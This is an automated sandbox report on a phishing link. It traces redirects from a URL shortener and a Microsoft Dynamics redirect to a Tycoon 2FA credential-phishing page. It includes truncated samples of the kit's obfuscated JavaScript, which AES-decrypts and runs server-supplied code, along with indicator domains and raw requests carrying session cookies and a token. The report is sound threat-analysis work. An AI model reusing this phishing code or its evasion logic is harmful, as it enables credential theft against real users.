Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://pdf.ac/3eQ2md

Overview

General Information

Sample URL:https://pdf.ac/3eQ2md
Analysis ID:1578377
Infos:

Detection

HTMLPhisher, Tycoon2FA
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Found malware configuration
Yara detected HtmlPhish10
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded SVGs detected
HTML title does not match URL
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64native
  • chrome.exe (PID: 2052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: BB7C48CDDDE076E7EB44022520F40F77)
    • chrome.exe (PID: 1348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=1832,i,4581618519772567088,118076782903170394,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2220 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • chrome.exe (PID: 6564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pdf.ac/3eQ2md" MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • cleanup
{"websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\",\"Netflix.com\"]"}
SourceRuleDescriptionAuthorStrings
0.93.id.script.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
    7.13.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
      7.13.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        7.14.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
          7.14.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T16:27:47.318622+010020221121Exploit Kit Activity Detected192.168.11.20498243.223.235.15443TCP
            2024-12-19T16:27:48.370052+010020221121Exploit Kit Activity Detected192.168.11.204983144.220.125.16443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0.93.id.script.csvMalware Configuration Extractor: Tycoon2FA {"websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\",\"Netflix.com\"]"}

            Phishing

            barindex
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'py.hubstabla.ru' does not match the legitimate domain for Microsoft., The domain 'hubstabla.ru' is unrelated to Microsoft and uses a Russian domain extension, which is unusual for Microsoft., The presence of input fields for 'Email, phone, or Skype' suggests an attempt to collect sensitive information, which is common in phishing sites. DOM: 7.14.pages.csv
            Source: Yara matchFile source: 7.13.pages.csv, type: HTML
            Source: Yara matchFile source: 7.14.pages.csv, type: HTML
            Source: Yara matchFile source: 0.93.id.script.csv, type: HTML
            Source: Yara matchFile source: 7.13.pages.csv, type: HTML
            Source: Yara matchFile source: 7.14.pages.csv, type: HTML
            Source: 0.76.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/soYF/#msdynmkt_trackingcon... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
            Source: 0.85.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/soYF/#msdynmkt_trackingcon... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially execute further malicious actions.
            Source: 0.89.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/soYF/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The combination of these behaviors strongly suggests malicious intent, potentially to prevent analysis or hide further malicious activities.
            Source: 0.77.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/soYF/#msdynmkt_trackingcon... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a potentially malicious domain. The combination of these behaviors strongly suggests that this script is intended to hinder security analysis and potentially carry out malicious activities.
            Source: 0.78.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/soYF/#msdynmkt_trackingcon... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, this script demonstrates highly suspicious and malicious behavior, posing a significant security risk.
            Source: 0.86.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/soYF/#msdynmkt_trackingcon... This script exhibits several high-risk behaviors, including data exfiltration, dynamic code execution, and redirects to potentially malicious domains. The script appears to be attempting to extract user data and redirect the user to an unknown destination, which is highly suspicious and indicative of malicious intent.
            Source: 0.90.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/425920345538109522YB7ADRVV... This script exhibits several high-risk behaviors, including dynamic code execution, redirects to suspicious domains, and aggressive DOM manipulation. It also attempts to detect and block common debugging and security tools, which is a strong indicator of malicious intent. The script's overall behavior is highly suspicious and poses a significant risk to the user's security and privacy.
            Source: 0.87.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://py.hubstabla.ru/soYF/... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `atob()` and string manipulation to decode and execute the script content is a clear indicator of potential malicious intent. Additionally, the script appears to be sending data to an external domain, which could be used for data exfiltration. The heavy obfuscation of the code further raises suspicions about the script's purpose. While the final score is capped at 7 due to the lack of clear evidence of malicious intent, this script should be thoroughly investigated and its behavior closely monitored.
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: Number of links: 0
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://www.pdffiller.com/jsfiller-desk19/?flat_pdf_quality=high&isShareViaLink=1&requestHash=a2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2&lang=en&projectId=1720458241&PAGE_REARRANGE_V2_MVP=true&richTextFormatting=true&isPageRearrangeV2MVP=true&jsf-page-rearrange-v2=true&jsf-redesign-full=true&act-notary-pro-integration=true&isSkipEditorLoadFrequency=true&jsf-desktop-ux-for-tablets=false&jsf-probability-70=true&jsf-socket-io=false&jsf-simplified-modes-iteration-1=false&jsf-offline-mode=false&routeId=7e6058c3c2cfc0c35e64ebfda2d729ea#652dbb9ebce848019b59684b5941e680HTTP Parser: Total embedded SVG size: 312084
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: Title: does not match URL
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: Invalid link: Terms of use
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: Invalid link: Privacy & cookies
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: Invalid link: Terms of use
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: Invalid link: Privacy & cookies
            Source: https://py.hubstabla.ru/soYF/#msdynmkt_trackingcontext=ab49e0ca-b84c-42e2-8da8-47dcc1154be4HTTP Parser: var vcujyfdxpx = "g";var puyellhbej = "z";var bauhjbaufe = window.location.hash.substr(1);if (bauhjbaufe) {bauhjbaufe = bauhjbaufe.split('#').pop();}if (!bauhjbaufe) { const urlparams = new urlsearchparams(window.location.search); if (window.location.href.includes('%23')) { bauhjbaufe = window.location.href.split('%23').pop(); } if (window.location.href.includes('?')) { bauhjbaufe = window.location.href.split('?').pop(); vcujyfdxpx = ""; puyellhbej = ""; }}function khffjkqtqo(lsnbnhodgu) {vtnuzfloqt = lsnbnhodgu.replace(/#/g, '').replace(/\?/g, '');$.ajax({type: "post",url: "/kfovxsxnmx6hr45seeo64orggepotkwsn6ax2twzv2trcew",data: {data: vtnuzfloqt},success: function(data) {var {a,b,c,d} = json.parse(data);bxcflikdkj = cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8);if...
            Source: https://py.hubstabla.ru/soYF/HTTP Parser: var rjpnkgnaby = "z";var zsaqmstiqq = "a";var zqmdhbycss = window.location.hash.substr(1);if (zqmdhbycss) {zqmdhbycss = zqmdhbycss.split('#').pop();}if (!zqmdhbycss) { const urlparams = new urlsearchparams(window.location.search); if (window.location.href.includes('%23')) { zqmdhbycss = window.location.href.split('%23').pop(); } if (window.location.href.includes('?')) { zqmdhbycss = window.location.href.split('?').pop(); rjpnkgnaby = ""; zsaqmstiqq = ""; }}function hsxvyzxzss(vwbikgznfv) {tpqlzgusoi = vwbikgznfv.replace(/#/g, '').replace(/\?/g, '');$.ajax({type: "post",url: "/kf6fv6ybrt29axf8ynnyt2nxphjwqmprqauhxcprbyzsifnfq",data: {data: tpqlzgusoi},success: function(data) {var {a,b,c,d} = json.parse(data);csnzrgtena = cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8);...
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "g0fy";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/uh4csw5ax2xcljbjrif4mywcj38gow475rf3hnzb";var gdf = "/ijofg3mngyqadpcod5jtouvggumtk2zq2d0uncd112";var odf = "/gh3yicozodm58sadhi9xwfuvszriqrybejfrab650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";let useragent = navigator.useragent;let browsername;let userip;let usercountry;var errorcodeexecuted = false;if(useragent.match(/chrome|chromium|crios/i)){ browsername = "chrome";} else if(useragent.matc...
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: <input type="password" .../> found
            Source: https://www.pdffiller.com/jsfiller-desk19/?flat_pdf_quality=high&isShareViaLink=1&requestHash=a2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2&lang=en&projectId=1720458241&PAGE_REARRANGE_V2_MVP=true&richTextFormatting=true&isPageRearrangeV2MVP=true&jsf-page-rearrange-v2=true&jsf-redesign-full=true&act-notary-pro-integration=true&isSkipEditorLoadFrequency=true&jsf-desktop-ux-for-tablets=false&jsf-probability-70=true&jsf-socket-io=false&jsf-simplified-modes-iteration-1=false&jsf-offline-mode=false&routeId=7e6058c3c2cfc0c35e64ebfda2d729ea#652dbb9ebce848019b59684b5941e680HTTP Parser: No favicon
            Source: https://www.pdffiller.com/jsfiller-desk19/?flat_pdf_quality=high&isShareViaLink=1&requestHash=a2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2&lang=en&projectId=1720458241&PAGE_REARRANGE_V2_MVP=true&richTextFormatting=true&isPageRearrangeV2MVP=true&jsf-page-rearrange-v2=true&jsf-redesign-full=true&act-notary-pro-integration=true&isSkipEditorLoadFrequency=true&jsf-desktop-ux-for-tablets=false&jsf-probability-70=true&jsf-socket-io=false&jsf-simplified-modes-iteration-1=false&jsf-offline-mode=false&routeId=7e6058c3c2cfc0c35e64ebfda2d729ea#652dbb9ebce848019b59684b5941e680HTTP Parser: No favicon
            Source: https://www.pdffiller.com/jsfiller-desk19/?flat_pdf_quality=high&isShareViaLink=1&requestHash=a2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2&lang=en&projectId=1720458241&PAGE_REARRANGE_V2_MVP=true&richTextFormatting=true&isPageRearrangeV2MVP=true&jsf-page-rearrange-v2=true&jsf-redesign-full=true&act-notary-pro-integration=true&isSkipEditorLoadFrequency=true&jsf-desktop-ux-for-tablets=false&jsf-probability-70=true&jsf-socket-io=false&jsf-simplified-modes-iteration-1=false&jsf-offline-mode=false&routeId=7e6058c3c2cfc0c35e64ebfda2d729ea#652dbb9ebce848019b59684b5941e680HTTP Parser: No favicon
            Source: https://public-usa.mkt.dynamics.com/api/orgs/be64e573-e0bd-ef11-b8e4-000d3a106803/r/TNVXGZpAEEeVLNCQ-7w9cAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fpublic-usa.mkt.dynamics.com%252Fapi%252Forgs%252Fbe64e573-e0bd-ef11-b8e4-000d3a106803%252Fr%252FyuBJq0y44kKNqEfcwRVL5AEAAAA%253Ftarget%253D%257B%2522TargetUrl%2522%25253A%2522https%2525253A%2525252F%2525252Fpy.hubstabla.ru%2525252FsoYF%2525252F%2522%25252C%2522RedirectOptions%2522%25253A%257B%25225%2522%25253Anull%25252C%25221%2522%25253Anull%257D%257D%2526digest%253Df0v0J5IzkAo34rBuFefg2clnhg1IoM5BcOKIi1BTBCA%25253D%2526secretVersion%253Da587597bbd2d4ba3bb4334f6d8be15ee%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=ce6Yi49QL7%2BEXcaIli3%2FTFOTczuiNNnio12L4NDMer0%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeHTTP Parser: No favicon
            Source: https://public-usa.mkt.dynamics.com/api/orgs/be64e573-e0bd-ef11-b8e4-000d3a106803/r/yuBJq0y44kKNqEfcwRVL5AEAAAA?target={%22TargetUrl%22%3A%22https%253A%252F%252Fpy.hubstabla.ru%252FsoYF%252F%22%2C%22RedirectOptions%22%3A{%225%22%3Anull%2C%221%22%3Anull}}&digest=f0v0J5IzkAo34rBuFefg2clnhg1IoM5BcOKIi1BTBCA%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee#msdynmkt_trackingcontext=1957d54c-409a-4710-952c-d090fbbc3d70HTTP Parser: No favicon
            Source: https://py.hubstabla.ru/soYF/#msdynmkt_trackingcontext=ab49e0ca-b84c-42e2-8da8-47dcc1154be4HTTP Parser: No favicon
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: No favicon
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: No favicon
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: No <meta name="author".. found
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: No <meta name="author".. found
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: No <meta name="copyright".. found
            Source: https://py.hubstabla.ru/425920345538109522YB7ADRVVJ8YKATSS35?MFTSZANXULLHRRJLLESUAu5zzihmcm98eyhoawowy0qgHTTP Parser: No <meta name="copyright".. found
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\scoped_dir2052_1411674139Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_2052_1724532703Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: pdf.ac to https://www.pdffiller.com/en/sharevialink/u056ysthbk5zoth3txvcng8zzmtuotu4c1i5bunqvwrrsgmyvwxjwwf2bkjwekzmkzk3cu4rsnjxdtznbfpmqzrsmve0mwzkbhppotrmclnor0l4egr2qm5ymtvtennhruvacljamm40bxv4y3nieun0mhzwq0jstjbgrfbjrituvtz5a3pfmgvxvvo3be44bvlbcw1vvdaxsjlorwrsykfxswtfk1hxnlh4rwhrcdbyznd4tzjdl2ftmyteut09.htm
            Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.11.20:49831 -> 44.220.125.16:443
            Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.11.20:49824 -> 3.223.235.15:443
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.137
            Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
            Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
            Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
            Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /3eQ2md HTTP/1.1Host: pdf.acConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /track/impressions?origin=https://www.pdffiller.com&initialPage=https%3A%2F%2Fwww.pdffiller.com%2Fjsfiller-desk19%2F%3Fflat_pdf_quality%3Dhigh%26isShareViaLink%3D1%26requestHash%3Da2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2%26lang%3Den%26projectId%3D1720458241%26PAGE_REARRANGE_V2_MVP%3Dtrue%26richTextFormatting%3Dtrue%26isPageRearrangeV2MVP%3Dtrue%26jsf-page-rearrange-v2%3Dtrue%26jsf-redesign-full%3Dtrue%26act-notary-pro-integration%3Dtrue%26isSkipEditorLoadFrequency%3Dtrue%26jsf-desktop-ux-for-tablets%3Dfalse%26jsf-probability-70%3Dtrue%26jsf-socket-io%3Dfalse%26jsf-simplified-modes-iteration-1%3Dfalse%26jsf-offline-mode%3Dfalse%26routeId%3D7e6058c3c2cfc0c35e64ebfda2d729ea%23652dbb9ebce848019b59684b5941e680 HTTP/1.1Host: sks.mrkhub.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.pdffiller.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.pdffiller.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /track/impressions?origin=https://www.pdffiller.com&initialPage=https%3A%2F%2Fwww.pdffiller.com%2Fjsfiller-desk19%2F%3Fflat_pdf_quality%3Dhigh%26isShareViaLink%3D1%26requestHash%3Da2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2%26lang%3Den%26projectId%3D1720458241%26PAGE_REARRANGE_V2_MVP%3Dtrue%26richTextFormatting%3Dtrue%26isPageRearrangeV2MVP%3Dtrue%26jsf-page-rearrange-v2%3Dtrue%26jsf-redesign-full%3Dtrue%26act-notary-pro-integration%3Dtrue%26isSkipEditorLoadFrequency%3Dtrue%26jsf-desktop-ux-for-tablets%3Dfalse%26jsf-probability-70%3Dtrue%26jsf-socket-io%3Dfalse%26jsf-simplified-modes-iteration-1%3Dfalse%26jsf-offline-mode%3Dfalse%26routeId%3D7e6058c3c2cfc0c35e64ebfda2d729ea%23652dbb9ebce848019b59684b5941e680 HTTP/1.1Host: sks.mrkhub.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sks_initial_page=eyJpdiI6Ii9qVmlVT3pQU1J0aXN3WU1LOWE4SWc9PSIsInZhbHVlIjoibTRzTG1kTkhLWVd5VkZSWmdsUXRaWnRwQUVBS0drY01hb0tOTjRhRVEwRzgwZUF6WkhRVnJ4UnNFdmtWNFEzMDVZNjdTQzhxUVVLMElSZk9BUWo1eXlGa0tEYWNCR0xnc2FsN3NCWjlnb0U9IiwibWFjIjoiZDg5ZDFkNjZjNmI0NmFjNzg2ZmNhNGRjMjk2NjBlN2Y5YWE2NmI4ODQ4OWU5MzU3ODMxZTE5MjczYzhjZGU2NSIsInRhZyI6IiJ9; sks_referrer=eyJpdiI6InZsTnFqMnA3S3lMS0huenNtRmo5QUE9PSIsInZhbHVlIjoib2xUSG9FaHF4NmFhcGRGOTBFYkxNdDlFYW9wVnBHNU5OUGEvYm13ZlNPSitoeG8rQy9XQVlVeXkrTFRJVjBZcyIsIm1hYyI6IjQyODllNzkyNmMxYzQyZDg1Y2JjZmZkZDcwMzIyYTgyMDVhYmY2MmJiNWRkNjRiMWYyNTI2OWIxOWM1Zjk4OWEiLCJ0YWciOiIifQ%3D%3D
            Source: global trafficHTTP traffic detected: GET /static/support-static/514/organisations/pdffiller/stylesheet/modals/feedback-modals.min.css HTTP/1.1Host: static.pdffiller.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.pdffiller.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bhjju3r92ph60t1at05f4bvuv5; stream_uuid=a00d4ee7-f74f-4ad3-845c-26806b82f93e; external_guest_id=a664c069d6.1734622052; airSlate_session_token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIxIiwiY2xpZW50X3V1aWQiOiIzNDVlYzEwNy04YjI0LTQ5NDUtOGMwZS1kY2ExYjg3MjgzZWUiLCJ1c2VyX3V1aWQiOiIwYmIyM2NmMi02OTRiLTRmMzEtYjc4Ny1hYzllYTE1MjkwOWYiLCJzY2hlbWUiOiJodHRwczovL29hdXRoLmFpcnNsYXRlLmNvbS9zY2hlbWUvZ3Vlc3QvYWNjZXNzLXRva2VuIiwic2NvcGVzIjpbIm9hdXRoOmd1ZXN0Il0sImV4cCI6MTczNDcwODQ1MiwibmJmIjoxNzM0NjIyMDUyLCJpYXQiOjE3MzQ2MjIwNTIsImp0aSI6ImMxYjQzMWRmLTYzZmItNGRhZi1hNTJmLWRlODIwZTQ0MTM5OCJ9.eButAxxG4FjnlgJvexcPu3MQ_Lfojrc2IdX38awlDIYp7Zqnjse9BMWkyegNMpBMVvYHRnWDrlAd_g086ak0wLw_loPcXcvTCsj-XIcgBZKCkWvPP2jQbyBp2kWbOD_ZTcjf1O6ym2p_LchyWZIPkn0lhI0JifO5JiUcYgmrxBmTRPhcVsHk6iIYvf41H6VBvxzz3JOcEHMJF2FWTjevFNnQDb-7k-zXlZGrBAJ6CGD4JiApuj1P5WvSKK-mZw9ICukp2NzwwIrHGEiX03MexGD4DY5Zgi_F7x1tPcn0PpE9cZwe6OO5JBW-EefwOlcbWHukjNaiZgsuFDbKeivzcDK98ftJvm5ObL_7jAiMQODL1pOl3ntB1IoMbSRQfr8DwAoDMhQKI7O_wIcXgYDxJEEIiGSFQamfjvy5uHN2sUkVLo9oPAiynyxhJ9TreaUvjxcZXF4t_sHsKMs30o